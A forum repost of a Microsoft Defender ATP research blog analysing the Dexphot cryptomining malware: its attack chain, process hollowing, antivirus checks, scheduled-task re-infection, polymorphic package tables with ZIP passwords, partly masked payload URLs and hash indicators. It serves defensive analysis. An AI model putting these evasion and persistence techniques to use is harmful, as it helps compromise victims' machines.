Create an account


Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Microsoft - Insights from 1 year of tracking a polymorphic threat

#1
Insights from 1 year of tracking a polymorphic threat

<div style="margin: 5px 5% 10px 5%;"><img src="https://www.sickgaming.net/blog/wp-content/uploads/2019/11/insights-from-1-year-of-tracking-a-polymorphic-threat.png" width="1642" height="745" title="" alt="" /></div><div><p>A little over a year ago, in October 2018, our polymorphic outbreak monitoring system detected a large surge in reports, indicating that a large-scale campaign was unfolding. We observed as the new threat attempted to deploy files that changed every 20-30 minutes on thousands of devices. We gave the threat the name “Dexphot,” based on certain characteristics of the malware code.</p>
<p>The Dexphot attack used a variety of sophisticated methods to evade security solutions. Layers of obfuscation, encryption, and the use of randomized file names hid the installation process. Dexphot then used <a href="https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/fileless-threats">fileless techniques</a> to run malicious code directly in memory, leaving only a few traces that can be used for forensics. It hijacked legitimate system processes to disguise malicious activity. If not stopped, Dexphot ultimately ran a cryptocurrency miner on the device, with monitoring services and scheduled tasks triggering re-infection when defenders attempt to remove the malware.</p>
<p>In the months that followed, we closely tracked the threat and witnessed the attackers upgrade the malware, target new processes, and work around defensive measures:</p>
<p><img class="aligncenter size-full wp-image-90222" src="https://www.sickgaming.net/blog/wp-content/uploads/2019/11/insights-from-1-year-of-tracking-a-polymorphic-threat.png" alt="Timeline of evolution of Dexphot malware" width="1642" height="745"></p>
<p>While <a href="https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp">Microsoft Defender Advanced Threat Protection</a>’s pre-execution detection engines blocked Dexphot in most cases, <a href="https://www.microsoft.com/security/blog/2019/10/08/in-hot-pursuit-of-elusive-threats-ai-driven-behavior-based-blocking-stops-attacks-in-their-tracks/">behavior-based machine learning models</a> provided protection for cases where the threat slipped through. Given the threat’s persistence mechanisms, polymorphism, and use of fileless techniques, behavior-based detection was a critical component of the comprehensive protection against this malware and other threats that exhibit similar malicious behaviors.</p>
<p>Microsoft Defender ATP data shows the effectiveness of behavioral blocking and containment capabilities in stopping the Dexphot campaign. Over time, Dexphot-related malicious behavior reports dropped to a low hum, as the threat lost steam.</p>
<p><img class="aligncenter size-full wp-image-90215" src="https://www.sickgaming.net/blog/wp-content/uploads/2019/11/insights-from-1-year-of-tracking-a-polymorphic-threat-1.png" alt="Number of machines that encountered Dexphot over time" width="1502" height="752"></p>
<p>Our close monitoring of Dexphot helped us ensure that our customers were protected from the evolving threat. More importantly, one year’s worth of intelligence helped us gain insight not only into the goals and motivations of Dexphot’s authors, but of cybercriminals in general.</p>
<h3>Complex attack chain</h3>
<p>The early stages of a Dexphot infection involves numerous files and processes. During the execution stage, Dexphot writes five key files to disk:</p>
<ol>
<li>An installer with two URLs</li>
<li>An MSI package file downloaded from one of the URLs</li>
<li>A password-protected ZIP archive</li>
<li>A loader DLL, which is extracted from the archive</li>
<li>An encrypted data file that holds three additional executables that are loaded into system processes via <a href="https://www.microsoft.com/security/blog/2017/07/12/detecting-stealthier-cross-process-injection-techniques-with-windows-defender-atp-process-hollowing-and-atom-bombing/">process hollowing</a></li>
</ol>
<p>Except for the installer, the other processes that run during execution are legitimate system processes. This can make detection and remediation more difficult. These legitimate system processes include <em>msiexec.exe</em> (for installing MSI packages), <em>unzip.exe</em> (for extracting files from the password-protected ZIP archive), <em>rundll32.exe</em> (for loading the loader DLL), <em>schtasks.exe</em> (for scheduled tasks), <em>powershell.exe</em> (for forced updates). In later stages, Dexphot targets a few other system processes for process hollowing: <em>svchost.exe</em>, <em>tracert.exe</em>, and <em>setup.exe</em>.</p>
<p><img class="aligncenter size-full wp-image-90223" src="https://www.sickgaming.net/blog/wp-content/uploads/2019/11/insights-from-1-year-of-tracking-a-polymorphic-threat-2.png" alt="Dexphot attack chain" width="1724" height="1017"></p>
<h3>Multiple layers of security evasion</h3>
<p>Based on Microsoft Defender ATP signals, <a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=SoftwareBundler:Win32/ICLoader&amp;threatId=222548">SoftwareBundler:Win32/ICLoader</a> and its variants are primarily used to drop and run the Dexphot installer. The installer uses two URLs to download malicious payloads. These are the same two URLs that Dexphot use later to establish persistence, update the malware, and re-infect the device.</p>
<p>The installer downloads an MSI package from one of the two URLs, and then launches <em>msiexec.exe</em> to perform a silent install. This is the first of several instances of Dexphot employing <a href="https://www.microsoft.com/security/blog/2019/09/26/bring-your-own-lolbin-multi-stage-fileless-nodersok-campaign-delivers-rare-node-js-based-malware/">living-off-the-land techniques</a>, the use of legitimate system processes for nefarious purposes.</p>
<p>Dexphot’s package often contains an obfuscated batch script. If the package contains this file, the script is the first thing that <em>msiexec.exe</em> runs when it begins the installation process. The said obfuscated script is designed to check for antivirus products. Dexphot halts the infection process immediately if an antivirus product is found running.</p>
<p>When we first began our research, the batch script only checked for antivirus products from Avast and AVG. Later, Windows Defender Antivirus was added to the checklist.</p>
<p><img class="aligncenter size-full wp-image-90220" src="https://www.sickgaming.net/blog/wp-content/uploads/2019/11/insights-from-1-year-of-tracking-a-polymorphic-threat-3.png" alt width="926" height="328"></p>
<p>If the process is not halted, Dexphot decompresses the password-protected ZIP archive from the MSI package. The password to this archive is within the MSI package. Along with the password, the malware’s authors also include a clean version of <em>unzip.exe</em> so that they don’t have to rely on the target system having a ZIP utility. The <em>unzip.exe</em> file in the package is usually named various things, such as <em>z.exe</em> or <em>ex.exe</em>, to avoid scrutiny.</p>
<p>The ZIP archive usually contains three files: the loader DLL, an encrypted data file (usually named <em>bin.dat</em>), and, often, one clean unrelated DLL, which is likely included to mislead detection.</p>
<p>Dexphot usually extracts the decompressed files to the target system’s Favorites folder. The files are given new, random names, which are generated by concatenating words and numbers based on the time of execution (for example,<em> C:\Users\&lt;user&gt;\Favorites\\Res.Center.ponse\&lt;numbers&gt;</em>). The commands to generate the new names are also obfuscated, for example:</p>
<p><img class="aligncenter size-full wp-image-90217" src="https://www.sickgaming.net/blog/wp-content/uploads/2019/11/insights-from-1-year-of-tracking-a-polymorphic-threat-4.png" alt width="878" height="132"></p>
<p><em>Msiexec.exe</em> next calls <em>rundll32.exe</em>, specifying loader DLL (<em>urlmon.7z</em> in the example above) in order to decrypt the data file. The decryption process involves ADD and XOR operations, using a key hardcoded in the binary.</p>
<p>The decrypted data contains three executables. Unlike the files described earlier, these executables are never written to the filesystem. Instead, they exist only in memory, and Dexphot runs them by loading them into other system processes via process hollowing.</p>
<h3>Stealthy execution through fileless techniques</h3>
<p><a href="https://www.microsoft.com/security/blog/2017/07/12/detecting-stealthier-cross-process-injection-techniques-with-windows-defender-atp-process-hollowing-and-atom-bombing/">Process hollowing</a> is a technique that can hide malware within a legitimate system process. It replaces the contents of the legitimate process with malicious code. Detecting malicious code hidden using this method is not trivial, so process hollowing has become a prevalent technique used by malware today.</p>
<p>This method has the additional benefit of being fileless: the code can be run without actually being saved on the file system. Not only is it harder to detect the malicious code while it’s running, it’s harder to find useful forensics after the process has stopped.</p>
<p>To initiate process hollowing, the loader DLL targets two legitimate system processes, for example svchost.exe or nslookup.exe, and spawns them in a suspended state. The loader DLL replaces the contents of these processes with the first and second decrypted executables. These executables are monitoring services for maintaining Dexphot’s components. The now-malicious processes are released from suspension and run.</p>
<p>Next, the loader DLL targets the <em>setup.exe</em> file in SysWoW64. It removes <em>setup.exe</em>’s contents and replaces them with the third decrypted executable, a cryptocurrency miner. Although Dexphot always uses a cryptocurrency miner of some kind, it’s not always the same miner. It used different programs like XMRig and JCE Miner over the course of our research.</p>
<p><img class="aligncenter size-full wp-image-90221" src="https://www.sickgaming.net/blog/wp-content/uploads/2019/11/insights-from-1-year-of-tracking-a-polymorphic-threat-5.png" alt width="736" height="117"></p>
<h3>Persistence through regularly scheduled malware updates</h3>
<p>The two monitoring services simultaneously check the status of all three malicious processes. Having dual monitoring services provides redundancy in case one of the monitoring processes is halted. If any of the processes are terminated, the monitors immediately identify the situation, terminate all remaining malicious processes, and re-infect the device. This forced update/re-infection process is started by a PowerShell command similar to the one below:</p>
<p><img class="aligncenter size-full wp-image-90218" src="https://www.sickgaming.net/blog/wp-content/uploads/2019/11/insights-from-1-year-of-tracking-a-polymorphic-threat-6.png" alt width="878" height="78"></p>
<p>The monitoring components also detect freshly launched <em>cmd.exe</em> processes and terminate them promptly. As a final fail-safe, Dexphot uses <em>schtasks.exe</em> to create scheduled tasks, with the command below.</p>
<p><img class="aligncenter size-full wp-image-90219" src="https://www.sickgaming.net/blog/wp-content/uploads/2019/11/insights-from-1-year-of-tracking-a-polymorphic-threat-7.png" alt width="878" height="60"></p>
<p>This persistence technique is interesting, because it employs two distinct MITRE ATT&amp;CK techniques: <a href="https://attack.mitre.org/techniques/T1053/">Scheduled Task</a> and <a href="https://attack.mitre.org/techniques/T1218/">Signed Binary Proxy Execution</a>.</p>
<p>The scheduled tasks call <em>msiexec.exe</em> as a proxy to run the malicious code, much like how <em>msiexec.exe</em> was used during installation. Using <em>msiexec.exe</em>, a legitimate system process, can make it harder to trace the source of malicious activity.</p>
<p>Furthermore, the tasks allow Dexphot to conveniently update the payload from the web every time the tasks run. They automatically update all of Dexphot’s components, both upon system reboot as well as every 90 or 110 minutes while the system is running.</p>
<p>Dexphot also generates the names for the tasks at runtime, which means a simple block list of hardcoded task names will not be effective in preventing them from running. The names are usually in a GUID format, although after we released our first round of Dexphot-blocking protections, the threat authors began to use random strings.</p>
<p>The threat authors have one more evasion technique for these scheduled tasks: some Dexphot variants copy <em>msiexec.exe</em> to an arbitrary location and give it a random name, such as <em>%AppData%\&lt;random&gt;.exe</em>. This makes the system process running malicious code a literal moving target.</p>
<h3>Polymorphism</h3>
<p>Dexphot exhibits multiple layers of polymorphism across the binaries it distributes. For example, the MSI package used in the campaign contains different files, as shown in the table below. The MSI packages generally include a clean version of <em>unzip.exe</em>, a password-protected ZIP file, and a batch file that checks for currently installed antivirus products. However, the batch file is not always present, and the names of the ZIP files and Loader DLLs, as well as the password for extracting the ZIP file, all change from one package to the next.</p>
<p>In addition, the contents of each Loader DLL differs from package to package, as does the encrypted data included in the ZIP file. This leads to the generation of a different ZIP archive and, in turn, a unique MSI package, each time the attacker bundles the files together. Because of these carefully designed layers of polymorphism, a traditional file-based detection approach wouldn’t be effective against Dexphot.</p>
<table border="1" width="600" align="center">
<tbody>
<tr>
<td rowspan="2" width="60"><strong>MSI package ID</strong></td>
<td colspan="3" width="268"><strong>MSI package contents</strong></td>
<td rowspan="2" width="101"><strong>Password for ZIP file</strong></td>
<td colspan="2" width="172"><strong>Contents of encrypted ZIP</strong></td>
</tr>
<tr>
<td width="88"><strong>Unzip.exe name</strong></td>
<td width="95"><strong>ZIP file name</strong></td>
<td width="84"><strong>Batch file name</strong></td>
<td width="123"><strong>Loader DLL file name</strong></td>
<td width="48"><strong>Encrypted data name</strong></td>
</tr>
<tr>
<td width="60">MSI-1</td>
<td width="88">ex.exe</td>
<td width="95">webUI.r0_</td>
<td width="84">f.bat</td>
<td width="101">kjfhwehjkf</td>
<td width="123">IECache.dll</td>
<td width="48">bin.dat</td>
</tr>
<tr>
<td width="60">MSI-2</td>
<td width="88">ex.exe</td>
<td width="95">analog.tv</td>
<td width="84">f.bat</td>
<td width="101">ZvDagW</td>
<td width="123">kernel32.bin</td>
<td width="48">bin.dat</td>
</tr>
<tr>
<td width="60">MSI-3</td>
<td width="88">z.exe</td>
<td width="95">yandex.zip</td>
<td width="84">f.bat</td>
<td width="101">jeremy</td>
<td width="123">SetupUi.dll</td>
<td width="48">bin.dat</td>
</tr>
<tr>
<td width="60">MSI-4</td>
<td width="88">unzip.exe</td>
<td width="95">ERDNT.LOC.zip</td>
<td width="84"></td>
<td width="101">iso100</td>
<td width="123">ERDNT.LOC</td>
<td width="48">data.bin</td>
</tr>
<tr>
<td width="60">MSI-5</td>
<td width="88">pck.exe</td>
<td width="95">mse.zip</td>
<td width="84"></td>
<td width="101">kika</td>
<td width="123">_steam.dll</td>
<td width="48">bin.dat</td>
</tr>
<tr>
<td width="60">MSI-6</td>
<td width="88">z.exe</td>
<td width="95">msi.zip</td>
<td width="84"></td>
<td width="101">arima</td>
<td width="123">ic64.dll</td>
<td width="48">bin.dat</td>
</tr>
<tr>
<td width="60">MSI-7</td>
<td width="88">z.exe</td>
<td width="95">mse.zip</td>
<td width="84">f.bat</td>
<td width="101">kika</td>
<td width="123">_steam.dll</td>
<td width="48">bin.dat</td>
</tr>
<tr>
<td width="60">MSI-8</td>
<td width="88">z.exe</td>
<td width="95">mse.zip</td>
<td width="84"></td>
<td width="101">kika</td>
<td width="123">_steam.dll</td>
<td width="48">bin.dat</td>
</tr>
<tr>
<td width="60">MSI-9</td>
<td width="88">z.exe</td>
<td width="95">yandex.zip</td>
<td width="84">f.bat</td>
<td width="101">jeremy</td>
<td width="123">SetupUi.dll</td>
<td width="48">bin.dat</td>
</tr>
<tr>
<td width="60">MSI-10</td>
<td width="88">hf.exe</td>
<td width="95">update.dat</td>
<td width="84">f.bat</td>
<td width="101">namr</td>
<td width="123">x32Frame.dll</td>
<td width="48">data.bin</td>
</tr>
<tr>
<td width="60">MSI-11</td>
<td width="88">z.exe</td>
<td width="95">yandex.zip</td>
<td width="84">f.bat</td>
<td width="101">jeremy</td>
<td width="123">SetupUi.dll</td>
<td width="48">bin.dat</td>
</tr>
<tr>
<td width="60">MSI-12</td>
<td width="88">unzip.exe</td>
<td width="95">PkgMgr.iso.zip</td>
<td width="84"></td>
<td width="101">pack</td>
<td width="123">PkgMgr.iso</td>
<td width="48">data.bin</td>
</tr>
<tr>
<td width="60">MSI-13</td>
<td width="88">ex.exe</td>
<td width="95">analog.tv</td>
<td width="84">f.bat</td>
<td width="101">kjfhwefkjwehjkf</td>
<td width="123">urlmon.7z</td>
<td width="48">bin.dat</td>
</tr>
<tr>
<td width="60">MSI-14</td>
<td width="88">ex.exe</td>
<td width="95">icon.ico</td>
<td width="84">f.bat</td>
<td width="101">ZDADW</td>
<td width="123">default.ocx</td>
<td width="48">bin.dat</td>
</tr>
<tr>
<td width="60">MSI-15</td>
<td width="88">hf.exe</td>
<td width="95">update.dat</td>
<td width="84"></td>
<td width="101">namr</td>
<td width="123">AvastFileRep.dll</td>
<td width="48">data.bin</td>
</tr>
<tr>
<td width="60">MSI-16</td>
<td width="88">pck.exe</td>
<td width="95">mse.zip</td>
<td width="84">f.bat</td>
<td width="101">kika</td>
<td width="123">_steam.dll</td>
<td width="48">bin.dat</td>
</tr>
<tr>
<td width="60">MSI-17</td>
<td width="88">z.exe</td>
<td width="95">mse.zip</td>
<td width="84">f.bat</td>
<td width="101">joft</td>
<td width="123">win2k.wim</td>
<td width="48">bin.dat</td>
</tr>
<tr>
<td width="60">MSI-18</td>
<td width="88">ex.exe</td>
<td width="95">plugin.cx</td>
<td width="84">f.bat</td>
<td width="101">ZDW</td>
<td width="123">_setup.ini</td>
<td width="48">bin.dat</td>
</tr>
<tr>
<td width="60">MSI-19</td>
<td width="88">hf.exe</td>
<td width="95">update.dat</td>
<td width="84"></td>
<td width="101">namr</td>
<td width="123">AvastFileRep.dll</td>
<td width="48">data.bin</td>
</tr>
<tr>
<td width="60">MSI-20</td>
<td width="88">ex.exe</td>
<td width="95">installers.msu</td>
<td width="84">f.bat</td>
<td width="101">000cehjkf</td>
<td width="123">MSE.Engine.dll</td>
<td width="48">bin.dat</td>
</tr>
<tr>
<td width="60">MSI-21</td>
<td width="88">z.exe</td>
<td width="95">msi.zip</td>
<td width="84">f.bat</td>
<td width="101">arima</td>
<td width="123">ic64.dll</td>
<td width="48">bin.dat</td>
</tr>
<tr>
<td width="60">MSI-22</td>
<td width="88">z.exe</td>
<td width="95">archive00.x</td>
<td width="84">f.bat</td>
<td width="101">00Jmsjeh20</td>
<td width="123">chrome_watcher.dll</td>
<td width="48">bin.dat</td>
</tr>
</tbody>
</table>
<h3>A multitude of payload hosts</h3>
<p>Besides tracking the files and processes that Dexphot uses to execute an attack, we have also been monitoring the domains used to host malicious payloads. The URLs used for hosting all follow a similar pattern. The domain address usually ends in a .info or .net TLD, while the file name for the actual payload consists of random characters, similar to the randomness previously seen being used to generate file names and scheduled tasks. Some examples from our research are shown in the table below.</p>
<table border="1" width="595" align="center">
<tbody>
<tr>
<td width="274"><strong>Scheduled task name</strong></td>
<td width="321"><strong>Download URL</strong></td>
</tr>
<tr>
<td width="274">hboavboja</td>
<td width="321">https://supe********709.info/xoslqzu.pdi</td>
</tr>
<tr>
<td width="274">{C0B15B19-AB02-0A10-259B-1789B8BD78D6}</td>
<td width="321">https://fa*****r.com/jz5jmdouv4js.uoe</td>
</tr>
<tr>
<td width="274">ytiazuceqeif</td>
<td width="321">https://supe********709.info/spkfuvjwadou.bbo</td>
</tr>
<tr>
<td width="274">beoxlwayou</td>
<td width="321">https://rb*****.info/xgvylniu.feo</td>
</tr>
<tr>
<td width="274">{F1B4C720-5A8B-8E97-8949-696A113E8BA5}</td>
<td width="321">https://emp*******winc.com/f85kr64p1s5k.naj</td>
</tr>
<tr>
<td width="274">gxcxhbvlkie</td>
<td width="321">https://gu*****me.net/ssitocdfsiu.pef</td>
</tr>
<tr>
<td width="274">{BE7FFC87-6635-429F-9F2D-CD3FD0E6DA51}</td>
<td width="321">https://sy*****.info/pasuuy/xqeilinooyesejou.oew</td>
</tr>
<tr>
<td width="274">{0575F553-1277-FB0F-AF67-EB649EE04B39}</td>
<td width="321">https://sumb*******on.info/gbzycb.kiz</td>
</tr>
<tr>
<td width="274">gposiiobhkwz</td>
<td width="321">https://gu*****me.net/uyuvmueie.hui</td>
</tr>
<tr>
<td width="274">{EAABDEAC-2258-1340-6375-5D5C1B7CEA7F}</td>
<td width="321">https://refr*******r711.info/3WIfUntot.1Mb</td>
</tr>
<tr>
<td width="274">zsayuuec</td>
<td width="321">https://gu*****me.net/dexaeuioiexpyva.dil</td>
</tr>
<tr>
<td width="274">njibqhcq</td>
<td width="321">https://supe********709.info/aodoweuvmnamugu.fux</td>
</tr>
<tr>
<td width="274">{22D36F35-F5C2-29D3-1CF1-C51AC19564A4}</td>
<td width="321">https://pr*****.info/ppaorpbafeualuwfx/hix.ayk</td>
</tr>
<tr>
<td width="274">qeubpmnu</td>
<td width="321">https://gu*****me.net/ddssaizauuaxvt.cup</td>
</tr>
<tr>
<td width="274">adeuuelv</td>
<td width="321">https://supe********709.info/tpneevqlqziee.okn</td>
</tr>
<tr>
<td width="274">{0B44027E-7514-5EC6-CE79-26EB87434AEF}</td>
<td width="321">https://sy*****.info/huauroxaxhlvyyhp/xho.eqx</td>
</tr>
<tr>
<td width="274">{5A29AFD9-63FD-9F5E-F249-5EC1F2238023}</td>
<td width="321">https://refr*******r711rb.info/s28ZXoDH4.78y</td>
</tr>
<tr>
<td width="274">{C5C1D86D-44BB-8EAA-5CDC-26B37F92E411}</td>
<td width="321">https://fa*****r.com/rbvelfbflyvf.rws</td>
</tr>
</tbody>
</table>
<p>Many of the URLs listed were in use for an extended period. However, the MSI packages hosted at each URL are frequently changed or updated. In addition, every few days more domains are generated to host more payloads. After a few months of monitoring, we were able to identify around 200 unique Dexphot domains.</p>
<h3>Conclusion: Dynamic, comprehensive protection against increasingly complex everyday threats</h3>
<p>Dexphot is not the type of attack that generates mainstream media attention; it’s one of the countless malware campaigns that are active at any given time. Its goal is a very common one in cybercriminal circles — to install a coin miner that silently steals computer resources and generates revenue for the attackers — yet Dexphot exemplifies the level of complexity and rate of evolution of even everyday threats, intent on evading protections and motivated to fly under the radar for the prospect of profit.</p>
<p>To combat threats, several <a href="https://www.microsoft.com/security/blog/2019/06/24/inside-out-get-to-know-the-advanced-technologies-at-the-core-of-microsoft-defender-atp-next-generation-protection/">next-generation protection engines</a> in <a href="https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp">Microsoft Defender Advanced Threat Protection</a>’s antivirus component detect and stop malicious techniques at multiple points along the attack chain. For Dexphot, machine learning-based detections in the cloud recognize and block the DLLs loaded by <em>rundll32.exe</em>, stopping the attack chain in its early stages. Memory scans detect and terminate the loading of malicious code hidden by process hollowing — including the monitoring processes that attempt to update the malware code and re-infect the machine via PowerShell commands.</p>
<p><a href="https://www.microsoft.com/security/blog/2019/10/08/in-hot-pursuit-of-elusive-threats-ai-driven-behavior-based-blocking-stops-attacks-in-their-tracks/">Behavioral blocking and containment capabilities</a> are especially effective in defeating Dexphot’s fileless techniques, detection evasion, and persistence mechanisms, including the periodic and boot-time attempts to update the malware via scheduled tasks. As mentioned, given the complexity of the attack chain and of Dexphot’s persistence methods, we released a <a href="https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/configure-remediation-windows-defender-antivirus">remediation</a> solution that prevents re-infection by removing artifacts.</p>
<p><img class="aligncenter size-full wp-image-90224" src="https://www.sickgaming.net/blog/wp-content/uploads/2019/11/insights-from-1-year-of-tracking-a-polymorphic-threat-8.png" alt="Microsoft Defender ATP solutions for Dexphot attack" width="1724" height="1017"></p>
<p>The detection, blocking, and remediation of Dexphot on endpoints are exposed in Microsoft Defender Security Center, where <a href="https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp">Microsoft Defender ATP</a>’s rich capabilities like endpoint detection and response, automated investigation and remediation, and others enable security operations teams to investigate and remediate attacks in enterprise environments. With these capabilities, Microsoft Defender ATP provides comprehensive protection against Dexphot and the countless other complex and evolving threats that we face every day.</p>
<h3>Sample indicators of compromise (IoCs)</h3>
<p>Installer (SHA-256):<br />72acaf9ff8a43c68416884a3fff3b23e749b4bb8fb39e16f9976643360ed391f</p>
<p>MSI files (SHA-256):<br />22beffb61cbdc2e0c3eefaf068b498b63a193b239500dab25d03790c467379e3<br />65eac7f9b67ff69cefed288f563b4d77917c94c410c6c6c4e4390db66305ca2a<br />ba9467e0d63ba65bf10650a3c8d36cd292b3f846983032a44a835e5966bc7e88</p>
<p>Loader DLLs&nbsp; (SHA-256):<br />537d7fe3b426827e40bbdd1d127ddb59effe1e9b3c160804df8922f92e0b366e<br />504cc403e0b83233f8d20c0c86b0611facc040b868964b4afbda3214a2c8e1c5<br />aa5c56fe01af091f07c56ac7cbd240948ea6482b6146e0d3848d450977dff152</p>
<p><strong><em>Hazel Kim</em></strong></p>
<p><em>Microsoft Defender ATP Research Team</em></p>
<hr>
<h3>Talk to us</h3>
<p>Questions, concerns, or insights on this story? Join discussions at the&nbsp;<a href="https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/bg-p/MicrosoftDefenderATPBlog">Microsoft Defender ATP community</a>.</p>
<p>Read all <a href="https://www.microsoft.com/security/blog/microsoft-security-intelligence/">Microsoft security intelligence blog posts</a>.</p>
<p>Follow us on Twitter <a href="https://twitter.com/MsftSecIntel" target="_blank" rel="noopener noreferrer"><strong>@MsftSecIntel</strong></a>.</p>
</div>


https://www.sickgaming.net/blog/2019/11/...ic-threat/
Reply



Forum Jump:


Users browsing this thread:
1 Guest(s)

Forum software by © MyBB Theme © iAndrew 2016